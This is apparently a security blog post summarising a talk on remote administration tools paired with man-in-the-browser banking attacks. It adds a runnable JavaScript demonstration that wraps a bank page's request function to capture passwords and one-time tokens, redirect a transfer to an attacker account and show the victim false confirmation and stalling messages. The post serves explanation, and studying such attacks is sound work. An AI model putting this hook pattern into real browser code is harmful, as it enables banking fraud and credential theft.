Uri Fleyder (RSA) and Uri Rivner (Biocatch)'s presentation yesterday, on the use of remote administration tools coupled with "man in the browser" attacks, is probably the most alarming threat exploitation I have seen recently.
The attack first exploits browser vulnerabilities through drive-by downloads to infect the target machine. I suppose a drive-by download is not even necessary; other infection vectors could also be used. Once the target machine is infected, the attacker can use a remote administration tool (RAT) to carry out the attack from the target machine itself. Through the "man in the browser" component, the attacker intercepts the victim's browser activity, such as online banking (or e-commerce, or any other session), and can not only capture data in real time but also take control of the browser and show the user false messages (for example that the login is taking longer than usual, or a false redirection).
The beauty of this attack is that it is carried out entirely from the target user's own machine, so to the bank it looks like the legitimate user's device and session, and one-time tokens are also compromised (through the use of redirections). And there are very few countermeasures ...
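To make the interception described above concrete, here is an added example of a minimal man-in-the-browser style hook. It is constructed for this page and is not code from the presentation or from the original post. Real MitB malware injects script into the browser process and wraps page APIs such as XMLHttpRequest or fetch; here a constructed stand-in for the bank page's request function is wrapped instead, so the whole thing runs under Node with no browser and no network. The site URLs, account names, credentials, one-time token and message texts are all made up.

```javascript
// Added example, not from the presentation or the post: a man-in-the-browser
// style hook around a constructed stand-in for a bank page's request function.

const LOGIN_URL = 'https://bank.example/login';       // assumed, illustrative
const TRANSFER_URL = 'https://bank.example/transfer'; // assumed, illustrative

// Constructed ledger so the effect of the redirection is observable.
const ledger = [];

// Stand-in for the banking site's request function (no real request is made).
function bankRequest(url, body) {
  if (url === LOGIN_URL) {
    return { status: 200, message: 'Welcome ' + body.user };
  }
  if (url === TRANSFER_URL) {
    ledger.push({ to: body.to, amount: body.amount });
    return { status: 200, message: 'Transfer of ' + body.amount + ' to ' + body.to + ' accepted' };
  }
  return { status: 404, message: 'not found' };
}

// The hook wraps the page's request function in place. It copies every
// request body before it leaves (credentials, one-time token, transfer
// details) into `sink` (in a real attack this goes to the RAT operator),
// can rewrite the request on the way out, and can replace what the page
// shows the user afterwards.
function installHook(original, attackerAccount, sink) {
  return function hooked(url, body) {
    sink.push({ url, body: { ...body } });            // real-time capture
    let sent = body;
    if (url === TRANSFER_URL) {
      sent = { ...body, to: attackerAccount };         // redirect the funds
    }
    const response = original(url, sent);
    if (url === TRANSFER_URL) {
      // False message: the user sees the transfer they intended, not the one that happened.
      return { ...response, message: 'Transfer of ' + body.amount + ' to ' + body.to + ' accepted' };
    }
    if (url === LOGIN_URL) {
      // Stalling message: keeps the user waiting while the captured token is still valid.
      return { ...response, message: 'Login is taking longer than usual, please wait' };
    }
    return response;
  };
}

// One victim session: the page code calls through the (now wrapped) function
// exactly as it would call the original.
function runSession() {
  ledger.length = 0;
  const sink = [];
  const pageRequest = installHook(bankRequest, 'ATTACKER-ACCT', sink);
  const login = pageRequest(LOGIN_URL, { user: 'alice', password: 'hunter2', otp: '482913' });
  const transfer = pageRequest(TRANSFER_URL, { to: 'LANDLORD-ACCT', amount: 500 });
  return { login, transfer, captured: sink, ledger: ledger.slice() };
}

console.log(JSON.stringify(runSession(), null, 2));
```

Running it shows the two things the presentation warns about: the sink holds the password and the one-time token the moment they are typed, and the ledger records a transfer to the attacker's account while the page reports the transfer the user asked for. Because the wrapped function runs inside the victim's own browser, nothing about the request's origin distinguishes it from a normal session.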